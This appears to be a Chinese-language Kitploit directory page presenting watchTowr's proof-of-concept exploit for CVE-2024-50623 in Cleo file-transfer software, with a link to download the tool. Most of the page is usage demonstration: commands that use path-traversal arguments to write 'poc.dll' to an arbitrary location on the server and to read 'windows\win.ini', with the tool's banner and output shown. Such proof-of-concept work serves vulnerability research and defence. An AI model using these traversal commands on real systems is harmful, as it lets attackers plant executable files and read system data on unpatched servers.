Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-50623 — Cleo 无限制文件上传和下载 PoC(CVE-2024-50623) | Kitploit
工具/GitHubGitHub/watchtowrlabs/cve-2024-50623
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubwatchtowrlabs/cve-2024-50623

CVE-2024-50623

Cleo 无限制文件上传和下载 PoC(CVE-2024-50623)

查看仓库
25711年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-50623

Cleo 无限制文件上传与下载漏洞利用演示 (CVE-2024-50623)

任意文件写入

root@kitploit:~
python CVE-2024-50623.py --target http://192.168.1.18:5080/Synchronization --action write --what poc.dll --where "..\..\..\..\poc.dll"
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        CVE-2024-50623.py
        (*) Cleo 无限制文件上传与下载漏洞 (CVE-2024-50623)

          - watchTowr 团队的 Sonny 和 Sina Kheirkhah (@SinSinology) ([email protected])

        CVEs: [CVE-2024-50623]
[INFO] 文件写入成功

任意文件读取

root@kitploit:~
python CVE-2024-50623.py --target http://192.168.1.18:5080/Synchronization --action read --what CVE-2024-50623.py --where "..\..\windows\win.ini"
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        CVE-2024-50623.py
        (*) Cleo 无限制文件上传与下载漏洞 (CVE-2024-50623)

          - watchTowr 团队的 Sonny 和 Sina Kheirkhah (@SinSinology) ([email protected])

        CVEs: [CVE-2024-50623]
; 用于 16 位应用程序支持
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

漏洞利用作者

本漏洞利用由 watchTowr (@watchtowrcyber) 团队的 Sonny 和 Sina Kheirkhah (@SinSinology) 编写

关注 watchTowr 实验室

获取最新的安全研究,请关注 watchTowr 实验室团队

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
下载工具